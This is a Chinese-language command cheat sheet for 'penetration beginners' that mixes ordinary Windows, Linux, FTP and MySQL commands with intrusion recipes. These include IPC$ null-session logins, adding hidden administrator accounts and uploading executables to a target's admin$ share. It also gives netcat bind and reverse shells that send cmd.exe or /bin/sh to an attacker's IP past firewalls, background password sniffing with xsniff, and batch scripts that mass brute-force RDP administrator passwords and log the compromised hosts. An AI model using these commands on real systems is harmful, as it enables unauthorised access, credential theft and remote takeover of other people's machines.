CMD、LINUX命令大全來了，不管電腦愛好者，還是滲透初學者，網絡安全大神，這裡為你整理的最全的系統命令，可謂是寶典級別，值得永久收藏！

cmd即命令行

各大windows系統下，運行框輸入cmd即可調出cmd黑白終端。

cmd召喚可執行程序

gpedit.msc-----組策略
sndrec32-------錄音機
sethc.exe------粘滯鍵（這個就算沒有開機密碼也能使用的程序，常用於繞過破解開機密碼的，後期爐錄視頻講解哈）
explorer-------打開資源管理器
logoff---------註銷命令
shutdown-------60秒倒計時關機命令
lusrmgr.msc----本機用戶和組
services.msc---本地服務設置oobe/msoobe /a----檢查XP是否激活
notepad--------打開記事本
cleanmgr-------垃圾整理
net start messenger----開始信使服務
compmgmt.msc---計算機管理
net stop messenger-----停止信使服務
conf-----------啟動netmeeting
dvdplay--------DVD播放器
charmap--------啟動字符映射表
diskmgmt.msc---磁盤管理實用程序
calc-----------啟動計算器
dfrg.msc-------磁盤碎片整理程序
chkdsk.exe-----Chkdsk磁盤檢查
devmgmt.msc--- 設備管理器
regsvr32 /u *.dll----停止dll文件運行
drwtsn32------ 系統醫生
rononce -p----15秒關機
dxdiag---------檢查DirectX信息
regedt32-------註冊表編輯器
Msconfig.exe---系統配置實用程序
rsop.msc-------組策略結果集
mem.exe--------顯示內存使用情況
regedit.exe----註冊表
winchat--------XP自帶局域網聊天
progman--------程序管理器
winmsd---------系統信息
perfmon.msc----計算機性能監測程序
winver---------檢查Windows版本
sfc /scannow-----掃描錯誤並復原
taskmgr-----任務管理器（2000/xp/2003
wmimgmt.msc----打開windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板
wiaacmgr-------掃描儀和照相機嚮導
winchat--------XP自帶局域網聊天
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
magnify--------放大鏡實用程序
mmc------------打開控制台（這個很重要）
mobsync--------同步命令
iexpress-------木馬捆綁工具，系統自帶
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查接口
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
ciadv.msc------索引服務程序
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
services.msc---本地服務設置
Sndvol32-------音量控制程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
ciadv.msc------索引服務程序
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
compmgmt.msc---計算機管理
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
charmap--------啟動字符映射表
cliconfg-------SQL SERVER 客戶端網絡實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
certmgr.msc----證書管理實用程序
regsvr32 /u *.dll----停止dll文件運行

cmd多命令行大法　

• net use ipipc$ ” ” /user:” ” 建立IPC空鏈接
• 　　net use ipipc$ “密碼” /user:”用戶名” 建立IPC非空鏈接
• 　　net use h: ipc$ “密碼” /user:”用戶名” 直接登陸後映射對方C：到本地為H:
• 　　net use h: ipc$ 登陸後映射對方C：到本地為H:
• 　　net use ipipc$ /del 刪除IPC鏈接
• 　　net use h: /del 刪除映射對方到本地的為H:的映射
• 　　net user 用戶名　密碼　/add 建立用戶
• 　　net user guest /active:yes 激活guest用戶
• 　　net user 查看有哪些用戶
• 　　net user 帳戶名 查看帳戶的屬性
• 　　net localgroup administrators 用戶名 /add 把”用戶”添加到管理員中使其具有管理員權限
• 　　net start 查看開啟了哪些服務
• 　　net start 服務名　開啟服務；(如:net start telnet， net start schedule)
• 　　net stop 服務名 停止某服務
• 　　net time 目標ip 查看對方時間
• 　　net time 目標ip /set 設置本地計算機時間與”目標IP”主機的時間同步,加上參數/yes可取消確認信息
• 　　net view 查看本地局域網內開啟了哪些共享
• 　　net view ip 查看對方局域網內開啟了哪些共享
• 　　net config 顯示系統網絡設置
• 　　net logoff 斷開連接的共享
• 　　net pause 服務名 暫停某服務
• 　　net send ip “文本信息” 向對方發信息
• 　　net ver 局域網內正在使用的網絡連接類型和信息
• 　　net share 查看本地開啟的共享
• 　　net share ipc$ 開啟ipc$共享
• 　　net share ipc$ /del 刪除ipc$共享
• 　　net share c$ /del 刪除C：共享
• 　　net user guest 12345 用guest用戶登陸後用將密碼改為12345
• 　　net password 密碼 更改系統登陸密碼
• 　　netstat -a 查看開啟了哪些端口,常用netstat -an
• 　　netstat -n 查看端口的網絡連接情況，常用netstat -an
• 　　netstat -v 查看正在進行的工作
• 　　netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況
• 　　netstat -s 查看正在使用的所有協議使用情況
• 　　nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名
• 　　tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：”-w數字”用於設置超時間隔。
• 　　ping ip(或域名) 向對方主機發送默認大小為32字節的數據，參數：”-l[空格]數據包大小”；”-n發送數據次數”；”-t”指一直ping。
• 　　ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
• 　　ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數”/all”顯示全部配置信息
• 　　tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
• 　　kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
• 　　del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如”DEL/AR *.*”表示刪除當前目錄下所有隻讀文件，”DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件
• 　　del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
• 　　move 盤符路徑要移動的文件名　存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
• 　　fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，”> “和”> >” 是重定向命令
• 　　at id號 開啟已註冊的某個計劃任務
• 　　at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
• 　　at id號 /delete 停止某個已註冊的計劃任務
• 　　at 查看所有的計劃任務
• 　　at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
• 　　finger username @host 查看最近有哪些用戶登陸
• 　　telnet ip 端口 遠和登陸服務器,默認端口為23
• 　　open ip 連接到IP（屬telnet登陸後的命令）
• 　　telnet 在本機上直接鍵入telnet 將進入本機的telnet
• 　　copy 路徑文件名1　路徑文件名2 /y 複製文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
• 　　copy c:srv.exe ipadmin$ 複製本地c:srv.exe到對方的admin下
• 　　copy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
• 　　copy ipadmin$svv.exe c: 或:copyipadmin$*.* 複製對方admini$共享下的srv.exe文件（所有文件）至本地C：
• 　　xcopy 要複製的文件或目錄樹　目標地址目錄名 複製文件和目錄樹，用參數/Y將不提示覆蓋相同文件
• 　　用參數/e才可連目錄下的子目錄一起複制到目標地址下。
• 　　tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將”IP”的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
• 　　tftp -i 對方IP　put c:server.exe 登陸後，上傳本地c:server.exe至主機
• 　　ftp ip 端口 用於上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
• 　　route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface
• 　　arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
• 　　start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
• 　　mem 查看cpu使用情況
• 　　attrib 文件名(目錄名) 查看某文件（目錄）的屬性
• 　　attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用+則是添加為某屬性
• 　　dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
• 　　date /t 、 time /t 使用此參數即”DATE/T”、”TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間
• 　　set 指定環境變量名稱=要指派給變量的字符 設置環境變量
• 　　set 顯示當前所有的環境變量
• 　　set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量
• 　　pause 暫停批處理程序，並顯示出：請按任意鍵繼續….
• 　　if 在批處理程序中執行條件處理（更多說明見if命令及變量）
• 　　goto 標籤 將cmd.exe導向到批處理程序中帶標籤的行（標籤必須單獨一行，且以冒號打頭，例如：”：start”標籤）
• 　　call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
• 　　for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量）
• 　　echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
• 　　echo 信息 在屏幕上顯示出信息
• 　　echo 信息 >> pass.txt 將”信息”保存到pass.txt文件中
• 　　findstr “Hello” aa.txt 在aa.txt文件中尋找字符串hello
• 　　find 文件名 查找某文件
• 　　title 標題名字 更改CMD窗口標題名字
• 　　color 顏色值 設置cmd控制台前景和背景顏色；0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
• 　　prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
• 　　ver 在DOS窗口下顯示版本信息
• 　　winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
• 　　format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
• 　　md　目錄名 創建目錄
• 　　replace 源文件　要替換文件的目錄 替換文件
• 　　ren 原文件名　新文件名 重命名文件名
• 　　tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
• 　　type 文件名 顯示文本文件的內容
• 　　more 文件名 逐屏顯示輸出文件
• 　　doskey 要鎖定的命令=字符
• 　　doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
• 　　taskmgr 調出任務管理器
• 　　chkdsk /F D: 檢查磁盤D並顯示狀態報告；加參數/f並修復磁盤上的錯誤
• 　　tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口
• 　　exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
• 　　path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
• 　　cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
• 　　regedit /s 註冊表文件名 導入註冊表；參數/S指安靜模式導入，無任何提示；
• 　　regedit /e 註冊表文件名 導出註冊表
• 　　cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權限；/G 用戶名:perm 賦予指定用戶訪問權限；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
• 　　cacls 文件名 查看文件的訪問用戶權限列表
• 　　REM 文本內容 在批處理文件中添加註解
• 　　netsh 查看或更改本地網絡配置情況

• 　taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
• 　　參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
• 　　tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
• 　　參數說明：/M 列出當前進程加載的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

cmd IIS服務命令

• 　　iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
• 　　iisreset /start或stop 啟動（停止）所有Internet服務
• 　　iisreset /restart 停止然後重新啟動所有Internet服務
• 　　iisreset /status 顯示所有Internet服務狀態
• 　　iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
• 　　iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
• 　　iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
• 　　iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。

cmd FTP 命令

• 　　ftp的命令行格式為:

ftp －v －d －i －n －g[主機名] －v 顯示遠程服務器的所有響應信息。

• 　　－d 使用調試方式。
• 　　－n 限制ftp的自動登錄,即不使用.netrc文件。
• 　　－g 取消全局文件名。
• 　　help [命令] 或 ？[命令] 查看命令說明
• 　　bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
• 　　pwd 列出當前遠端主機目錄
• 　　put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
• 　　get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
• 　　mget [remote-files] 從遠端主機接收一批文件至本地主機
• 　　mput local-files 將本地主機中一批文件傳送至遠端主機
• 　　dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
• 　　ascii 設定以ASCII方式傳送文件(缺省值)
• 　　bin 或 image 設定以二進制方式傳送文件
• 　　bell 每完成一次文件傳送,報警提示
• 　　cdup 返回上一級目錄
• 　　close 中斷與遠程服務器的ftp會話(與open對應)
• 　　open host[port] 建立指定ftp服務器連接,可指定連接端口
• 　　delete 刪除遠端主機中的文件
• 　　mdelete [remote-files] 刪除一批文件
• 　　mkdir directory-name 在遠端主機中建立目錄
• 　　rename [from] [to] 改變遠端主機中的文件名
• 　　rmdir directory-name 刪除遠端主機中的目錄
• 　　status 顯示當前FTP的狀態
• 　　system 顯示遠端主機系統類型
• 　　user user-name [password] [account] 重新以別的用戶名登錄遠端主機
• 　　open host [port] 重新建立一個新的連接
• 　　prompt 交互提示模式
• 　　macdef 定義宏命令
• 　　lcd 改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄
• 　　chmod 改變遠端主機的文件權限
• 　　case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
• 　　cd remote－dir 進入遠程主機目錄
• 　　cdup 進入遠程主機目錄的父目錄
• 　　! 在本地機中執行交互shell，exit回到ftp環境,如!ls*.zip

cmd MySQL 命令

• 　　mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
• 　　exit 退出MYSQL
• 　　mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
• 　　grant select on 數據庫.* to 用戶名@登錄主機 identified by “密碼”; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
• 　　show databases; 顯示數據庫列表。剛開始時才兩個數據庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
• 　　use mysql；
• 　　show tables; 顯示庫中的數據表
• 　　describe 表名; 顯示數據表的結構
• 　　create database 庫名; 建庫
• 　　use 庫名；
• 　　create table 表名 (字段設定列表)； 建表
• 　　drop database 庫名;
• 　　drop table 表名； 刪庫和刪表
• 　　delete from 表名; 將表中記錄清空
• 　　select * from 表名; 顯示錶中的記錄
• 　　mysqldump –opt school>school.bbb 備份數據庫：（命令在DOS的mysqlin目錄下執行）;注釋:將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。

Linux系統下基本命令

• 　　uname 顯示版本信息
• 　　ls -al 顯示包括隱藏文件
• 　　pwd 查詢當前所在的目錄位置
• 　　cd cd　..回到上一層目錄，注意cd 與..之間有空格。cd　/返回到根目錄。
• 　　cat 文件名 查看文件內容
• 　　cat >abc.txt 往abc.txt文件中寫上內容。
• 　　more 文件名 以一頁一頁的方式顯示一個文本文件。
• 　　cp 複製文件
• 　　mv 移動文件
• 　　rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
• 　　mkdir 目錄名 建立目錄
• 　　rmdir 刪除子目錄，目錄內沒有文檔。
• 　　chmod 設定檔案或目錄的存取權限
• 　　grep 在檔案中查找字符串
• 　　diff 檔案文件比較
• 　　find 檔案搜尋
• 　　date 現在的日期、時間
• 　　who 查詢目前和你使用同一台機器的人以及Login時間地點
• 　　w 查詢目前上機者的詳細資料
• 　　whoami 查看自己的帳號名稱
• 　　groups 查看某人的Group
• 　　passwd 更改密碼
• 　　history 查看自己下過的命令
• 　　ps 顯示進程狀態
• 　　kill 停止某進程
• 　　gcc 黑客通常用它來編譯C語言寫的文件
• 　　su 權限轉換為指定使用者
• 　　telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
• 　　ftp ftp連接上某服務器（同win2K）
• echo 文本 > file.txt 往文件里寫入以行計算的字符（或覆蓋！）
• echo 文本 >> file.txt 在文件後面附件文本

　系統外部命令

註：需下載相關工具使用。

【瑞士軍刀：nc.exe】

• 　　-h 查看幫助信息
• 　　-d 後台模式
• 　　-e prog程序重定向，一但連接就執行[危險]
• 　　-i secs延時的間隔
• 　　-l 監聽模式，用於入站連接
• 　　-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
• 　　-n IP地址，不能用域名
• 　　-o film記錄16進制的傳輸
• 　　-p[空格]端口 本地端口號
• 　　-r 隨機本地及遠程端口
• 　　-t 使用Telnet交互方式
• 　　-u UDP模式
• 　　-v 詳細輸出，用-vv將更詳細
• 　　-w數字 timeout延時間隔
• 　　-z 將輸入，輸出關掉（用於掃錨時）
• 　　基本用法：
• 　　nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80端口
• 　　nc -l -p 80 開啟本機的TCP 80端口並監聽
• 　　nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口
• 　　nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口
• 　　nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354端口
• 　　高級用法：
• 　　nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80端口，直到CTR+C為止
• 　　nc -L -p 80 > c:log.txt 作為蜜罐用2：開啟並不停地監聽80端口，直到CTR+C,同時把結果輸出到c:log.txt
• 　　nc -L -p 80 < c:honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80端口，直到CTR+C,並把c:honeyport.txt中內容送入管道中，亦可起到傳送文件作用
• 　　type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80端口，直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
• 　　本機上用：nc -l -p 本機端口
• 　　在對方主機上用：nc -e cmd.exe 本機IP -p 本機端口 *win2K
• 　　nc -e /bin/sh 本機IP -p 本機端口 *linux,unix 反向連接突破對方主機的防火牆
• 　　本機上用：nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
• 　　在對方主機上用：nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機

• 　　| 管道命令
• 　　< 或 > 重定向命令。”<“，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
• 　　@ 表示執行@後面的命令，但不會顯示出來（後台執行）；例：@dir c:winnt >> d:log.txt 意思是：後台執行dir，並把結果存在d:log.txt中
• 　　>與>>的區別 “>”指：覆蓋；”>>”指：保存到(添加到）。
• 　　如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

【掃描工具：xscan.exe】

• 　　xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨”起始IP到終止IP”段的所有主機信息
• 　　xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨”主機IP列表文件名”中的所有主機信息
• 　　檢測項目
• 　　-active 檢測主機是否存活
• 　　-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
• 　　-port 檢測常用服務的端口狀態
• 　　-ftp 檢測FTP弱口令
• 　　-pub 檢測FTP服務匿名用戶寫權限
• 　　-pop3 檢測POP3-Server弱口令
• 　　-smtp 檢測SMTP-Server漏洞
• 　　-sql 檢測SQL-Server弱口令
• 　　-smb 檢測NT-Server弱口令
• 　　-iis 檢測IIS編碼/解碼漏洞
• 　　-cgi 檢測CGI漏洞
• 　　-nasl 加載Nessus攻擊腳本
• 　　-all 檢測以上所有項目
• 　　其它選項
• 　　-i 適配器編號 設置網絡適配器, <適配器編號>可通過”-l”參數獲取
• 　　-l 顯示所有網絡適配器
• 　　-v 顯示詳細掃描進度
• 　　-p 跳過沒有響應的主機
• 　　-o 跳過沒有檢測到開放端口的主機
• 　　-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
• 　　-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
• 　　用法示例
• 　　xscan -host 192.168.1.1-192.168.255.255 -all -active -p　檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
• 　　xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標準端口狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放端口的主機
• 　　xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測”hostlist.txt”文件中列出的所有主機的標準端口狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放端口的主機

　【命令行方式嗅探器: xsniff.exe】

可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼

• 　　-tcp 輸出TCP數據報
• 　　-udp 輸出UDP數據報
• 　　-icmp 輸出ICMP數據報
• 　　-pass 過濾密碼信息
• 　　-hide 後台運行
• 　　-host 解析主機名
• 　　-addr IP地址 過濾IP地址
• 　　-port 端口 過濾端口
• 　　-log 文件名 將輸出保存到文件
• 　　-asc 以ASCII形式輸出
• 　　-hex 以16進制形式輸出
• 　　用法示例
• 　　xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
• 　　xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

【終端服務密碼破解: tscrack.exe】

• 　　-h 顯示使用幫助
• 　　-v 顯示版本信息
• 　　-s 在屏幕上打出解密能力
• 　　-b 密碼錯誤時發出的聲音
• 　　-t 同時發出多個連接（多線程）
• 　　-N Prevent System Log entries on targeted server
• 　　-U 卸載移除tscrack組件
• 　　-f 使用－f後面的密碼
• 　　-F 間隔時間（頻率）
• 　　-l 使用－l後面的用戶名
• 　　-w 使用－w後面的密碼字典
• 　　-p 使用－p後面的密碼
• 　　-D 登錄主頁面
• 　　用法示例
• 　　tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼
• 　　tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶
• 　　@if not exist ipcscan.txt goto noscan
• 　　@for /f “tokens=1 delims= ” %%i in (3389.txt) do call hack.bat %%i
• 　　nscan
• 　　@echo 3389.txt no find or scan faild
• 　　(①存為3389.bat) （假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
• 　　3389.bat意思是：從3389.txt文件中取一個IP，接着運行hack.bat
• 　　@if not exist tscrack.exe goto noscan
• 　　@tscrack %1 -l administrator -w pass.dic >>rouji.txt
• 　　:noscan
• 　　@echo tscrack.exe no find or scan faild
• 　　(②存為hack.bat) (運行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下；就可以等待結果了)
• 　　hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼，並將破解結果保存在rouji.txt文件中。